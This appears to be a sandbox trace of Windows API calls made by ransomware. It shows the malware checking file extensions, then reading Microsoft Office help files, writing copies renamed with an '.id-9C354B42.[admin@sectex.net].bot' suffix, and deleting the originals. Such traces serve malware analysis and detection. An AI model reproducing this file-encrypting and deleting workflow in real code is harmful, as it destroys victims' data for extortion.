	[0148.154] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0148.154] lstrlenW (lpString=".bz2") returned 4
	[0148.154] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0148.154] lstrlenW (lpString=".7z") returned 3
	[0148.154] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0148.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS") returned 57
	[0148.154] lstrlenW (lpString=".dbf") returned 4
	[0148.154] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0148.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS") returned 57
	[0148.154] lstrlenW (lpString=".1cd") returned 4
	[0148.155] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0148.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS") returned 57
	[0148.155] lstrlenW (lpString=".jpg") returned 4
	[0148.155] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0148.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS") returned 57
	[0148.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS") returned 57
	[0148.155] lstrlenW (lpString=".doc") returned 4
	[0148.155] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0148.155] lstrlenW (lpString=".docx") returned 5
	[0148.155] lstrcmpiW (lpString1=".docx", lpString2="B.HXS") returned -1
	[0148.155] lstrlenW (lpString=".pdf") returned 4
	[0148.155] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0148.155] lstrlenW (lpString=".xls") returned 4
	[0148.155] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0148.155] lstrlenW (lpString=".xlsx") returned 5
	[0148.155] lstrcmpiW (lpString1=".xlsx", lpString2="B.HXS") returned -1
	[0148.155] lstrlenW (lpString=".ppt") returned 4
	[0148.155] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0148.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS") returned 57
	[0148.155] lstrlenW (lpString=".zip") returned 4
	[0148.155] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0148.155] lstrlenW (lpString=".rar") returned 4
	[0148.155] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0148.155] lstrlenW (lpString=".bz2") returned 4
	[0148.155] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0148.155] lstrlenW (lpString=".7z") returned 3
	[0148.155] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0148.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS") returned 57
	[0148.155] lstrlenW (lpString=".dbf") returned 4
	[0148.155] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0148.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS") returned 57
	[0148.155] lstrlenW (lpString=".1cd") returned 4
	[0148.156] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0148.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS") returned 57
	[0148.156] lstrlenW (lpString=".jpg") returned 4
	[0148.156] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0148.156] lstrcmpiW (lpString1=".OPG", lpString2=".bot") returned 1
	[0148.156] lstrlenW (lpString="MSPUB.OPG") returned 9
	[0148.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.opg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0148.157] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=12024) returned 1
	[0148.157] CloseHandle (hObject=0x268) returned 1
	[0148.157] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.opg")) returned 0x20
	[0148.157] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.opg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.opg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0148.158] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.158] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.opg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0148.158] GetLastError () returned 0x0
	[0148.158] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x2ef8, lpOverlapped=0x0) returned 1
	[0148.269] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x2f00, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x2f00, lpOverlapped=0x0) returned 1
	[0148.271] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.271] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0148.271] SetEndOfFile (hFile=0x3b0) returned 1
	[0148.271] CloseHandle (hObject=0x3b0) returned 1
	[0148.272] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.272] SetEndOfFile (hFile=0x268) returned 1
	[0148.274] CloseHandle (hObject=0x268) returned 1
	[0148.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.274] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.opg")) returned 1
	[0148.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG") returned 57
	[0148.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG") returned 57
	[0148.275] lstrlenW (lpString=".doc") returned 4
	[0148.275] lstrcmpiW (lpString1=".doc", lpString2=".OPG") returned -1
	[0148.275] lstrlenW (lpString=".docx") returned 5
	[0148.275] lstrcmpiW (lpString1=".docx", lpString2="B.OPG") returned -1
	[0148.275] lstrlenW (lpString=".pdf") returned 4
	[0148.275] lstrcmpiW (lpString1=".pdf", lpString2=".OPG") returned 1
	[0148.275] lstrlenW (lpString=".xls") returned 4
	[0148.275] lstrcmpiW (lpString1=".xls", lpString2=".OPG") returned 1
	[0148.275] lstrlenW (lpString=".xlsx") returned 5
	[0148.275] lstrcmpiW (lpString1=".xlsx", lpString2="B.OPG") returned -1
	[0148.275] lstrlenW (lpString=".ppt") returned 4
	[0148.275] lstrcmpiW (lpString1=".ppt", lpString2=".OPG") returned 1
	[0148.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG") returned 57
	[0148.275] lstrlenW (lpString=".zip") returned 4
	[0148.275] lstrcmpiW (lpString1=".zip", lpString2=".OPG") returned 1
	[0148.275] lstrlenW (lpString=".rar") returned 4
	[0148.275] lstrcmpiW (lpString1=".rar", lpString2=".OPG") returned 1
	[0148.275] lstrlenW (lpString=".bz2") returned 4
	[0148.275] lstrcmpiW (lpString1=".bz2", lpString2=".OPG") returned -1
	[0148.275] lstrlenW (lpString=".7z") returned 3
	[0148.275] lstrcmpiW (lpString1=".7z", lpString2="OPG") returned -1
	[0148.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG") returned 57
	[0148.275] lstrlenW (lpString=".dbf") returned 4
	[0148.275] lstrcmpiW (lpString1=".dbf", lpString2=".OPG") returned -1
	[0148.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG") returned 57
	[0148.275] lstrlenW (lpString=".1cd") returned 4
	[0148.275] lstrcmpiW (lpString1=".1cd", lpString2=".OPG") returned -1
	[0148.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG") returned 57
	[0148.276] lstrlenW (lpString=".jpg") returned 4
	[0148.276] lstrcmpiW (lpString1=".jpg", lpString2=".OPG") returned -1
	[0148.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG") returned 57
	[0148.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG") returned 57
	[0148.276] lstrlenW (lpString=".doc") returned 4
	[0148.276] lstrcmpiW (lpString1=".doc", lpString2=".OPG") returned -1
	[0148.276] lstrlenW (lpString=".docx") returned 5
	[0148.276] lstrcmpiW (lpString1=".docx", lpString2="B.OPG") returned -1
	[0148.276] lstrlenW (lpString=".pdf") returned 4
	[0148.276] lstrcmpiW (lpString1=".pdf", lpString2=".OPG") returned 1
	[0148.276] lstrlenW (lpString=".xls") returned 4
	[0148.276] lstrcmpiW (lpString1=".xls", lpString2=".OPG") returned 1
	[0148.276] lstrlenW (lpString=".xlsx") returned 5
	[0148.276] lstrcmpiW (lpString1=".xlsx", lpString2="B.OPG") returned -1
	[0148.276] lstrlenW (lpString=".ppt") returned 4
	[0148.276] lstrcmpiW (lpString1=".ppt", lpString2=".OPG") returned 1
	[0148.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG") returned 57
	[0148.276] lstrlenW (lpString=".zip") returned 4
	[0148.276] lstrcmpiW (lpString1=".zip", lpString2=".OPG") returned 1
	[0148.276] lstrlenW (lpString=".rar") returned 4
	[0148.276] lstrcmpiW (lpString1=".rar", lpString2=".OPG") returned 1
	[0148.276] lstrlenW (lpString=".bz2") returned 4
	[0148.276] lstrcmpiW (lpString1=".bz2", lpString2=".OPG") returned -1
	[0148.276] lstrlenW (lpString=".7z") returned 3
	[0148.276] lstrcmpiW (lpString1=".7z", lpString2="OPG") returned -1
	[0148.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG") returned 57
	[0148.276] lstrlenW (lpString=".dbf") returned 4
	[0148.276] lstrcmpiW (lpString1=".dbf", lpString2=".OPG") returned -1
	[0148.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG") returned 57
	[0148.276] lstrlenW (lpString=".1cd") returned 4
	[0148.277] lstrcmpiW (lpString1=".1cd", lpString2=".OPG") returned -1
	[0148.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG") returned 57
	[0148.277] lstrlenW (lpString=".jpg") returned 4
	[0148.277] lstrcmpiW (lpString1=".jpg", lpString2=".OPG") returned -1
	[0148.277] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0148.277] lstrlenW (lpString="MSTORE.HXS") returned 10
	[0148.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0148.314] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=389716) returned 1
	[0148.314] CloseHandle (hObject=0x3c0) returned 1
	[0148.314] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore.hxs")) returned 0x20
	[0148.326] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0148.327] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.327] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore.hxs.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0148.328] GetLastError () returned 0x0
	[0148.328] ReadFile (in: hFile=0x388, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x5f254, lpOverlapped=0x0) returned 1
	[0148.346] WriteFile (in: hFile=0x3bc, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x5f260, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x5f260, lpOverlapped=0x0) returned 1
	[0148.362] ReadFile (in: hFile=0x388, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.362] WriteFile (in: hFile=0x3bc, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0148.362] SetEndOfFile (hFile=0x3bc) returned 1
	[0148.362] CloseHandle (hObject=0x3bc) returned 1
	[0148.362] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.362] SetEndOfFile (hFile=0x388) returned 1
	[0148.371] CloseHandle (hObject=0x388) returned 1
	[0148.371] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.371] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore.hxs")) returned 1
	[0148.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS") returned 58
	[0148.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS") returned 58
	[0148.372] lstrlenW (lpString=".doc") returned 4
	[0148.372] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0148.372] lstrlenW (lpString=".docx") returned 5
	[0148.372] lstrcmpiW (lpString1=".docx", lpString2="E.HXS") returned -1
	[0148.372] lstrlenW (lpString=".pdf") returned 4
	[0148.372] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0148.372] lstrlenW (lpString=".xls") returned 4
	[0148.372] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0148.372] lstrlenW (lpString=".xlsx") returned 5
	[0148.372] lstrcmpiW (lpString1=".xlsx", lpString2="E.HXS") returned -1
	[0148.372] lstrlenW (lpString=".ppt") returned 4
	[0148.372] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0148.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS") returned 58
	[0148.373] lstrlenW (lpString=".zip") returned 4
	[0148.373] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0148.373] lstrlenW (lpString=".rar") returned 4
	[0148.373] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0148.373] lstrlenW (lpString=".bz2") returned 4
	[0148.373] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0148.373] lstrlenW (lpString=".7z") returned 3
	[0148.373] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0148.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS") returned 58
	[0148.373] lstrlenW (lpString=".dbf") returned 4
	[0148.373] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0148.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS") returned 58
	[0148.373] lstrlenW (lpString=".1cd") returned 4
	[0148.373] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0148.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS") returned 58
	[0148.373] lstrlenW (lpString=".jpg") returned 4
	[0148.373] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0148.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS") returned 58
	[0148.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS") returned 58
	[0148.373] lstrlenW (lpString=".doc") returned 4
	[0148.373] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0148.373] lstrlenW (lpString=".docx") returned 5
	[0148.373] lstrcmpiW (lpString1=".docx", lpString2="E.HXS") returned -1
	[0148.373] lstrlenW (lpString=".pdf") returned 4
	[0148.373] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0148.373] lstrlenW (lpString=".xls") returned 4
	[0148.373] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0148.373] lstrlenW (lpString=".xlsx") returned 5
	[0148.373] lstrcmpiW (lpString1=".xlsx", lpString2="E.HXS") returned -1
	[0148.373] lstrlenW (lpString=".ppt") returned 4
	[0148.374] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0148.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS") returned 58
	[0148.374] lstrlenW (lpString=".zip") returned 4
	[0148.374] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0148.374] lstrlenW (lpString=".rar") returned 4
	[0148.374] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0148.374] lstrlenW (lpString=".bz2") returned 4
	[0148.374] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0148.374] lstrlenW (lpString=".7z") returned 3
	[0148.374] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0148.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS") returned 58
	[0148.374] lstrlenW (lpString=".dbf") returned 4
	[0148.374] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0148.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS") returned 58
	[0148.374] lstrlenW (lpString=".1cd") returned 4
	[0148.374] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0148.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS") returned 58
	[0148.374] lstrlenW (lpString=".jpg") returned 4
	[0148.374] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0148.374] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0148.374] lstrlenW (lpString="MSTORE_COL.HXC") returned 14
	[0148.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0148.375] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=626) returned 1
	[0148.375] CloseHandle (hObject=0x388) returned 1
	[0148.375] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxc")) returned 0x20
	[0148.375] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0148.375] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.376] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0148.376] GetLastError () returned 0x0
	[0148.376] ReadFile (in: hFile=0x388, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x272, lpOverlapped=0x0) returned 1
	[0148.655] WriteFile (in: hFile=0x3bc, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x280, lpOverlapped=0x0) returned 1
	[0148.655] ReadFile (in: hFile=0x388, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.655] WriteFile (in: hFile=0x3bc, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0148.656] SetEndOfFile (hFile=0x3bc) returned 1
	[0148.656] CloseHandle (hObject=0x3bc) returned 1
	[0148.656] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.656] SetEndOfFile (hFile=0x388) returned 1
	[0148.658] CloseHandle (hObject=0x388) returned 1
	[0148.658] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.680] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxc")) returned 1
	[0148.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62
	[0148.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62
	[0148.718] lstrlenW (lpString=".doc") returned 4
	[0148.718] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0148.718] lstrlenW (lpString=".docx") returned 5
	[0148.718] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0148.718] lstrlenW (lpString=".pdf") returned 4
	[0148.718] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0148.718] lstrlenW (lpString=".xls") returned 4
	[0148.718] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0148.718] lstrlenW (lpString=".xlsx") returned 5
	[0148.718] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0148.718] lstrlenW (lpString=".ppt") returned 4
	[0148.718] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0148.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62
	[0148.718] lstrlenW (lpString=".zip") returned 4
	[0148.718] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0148.718] lstrlenW (lpString=".rar") returned 4
	[0148.718] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0148.718] lstrlenW (lpString=".bz2") returned 4
	[0148.718] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0148.718] lstrlenW (lpString=".7z") returned 3
	[0148.718] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0148.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62
	[0148.718] lstrlenW (lpString=".dbf") returned 4
	[0148.718] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0148.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62
	[0148.719] lstrlenW (lpString=".1cd") returned 4
	[0148.719] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0148.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62
	[0148.719] lstrlenW (lpString=".jpg") returned 4
	[0148.719] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
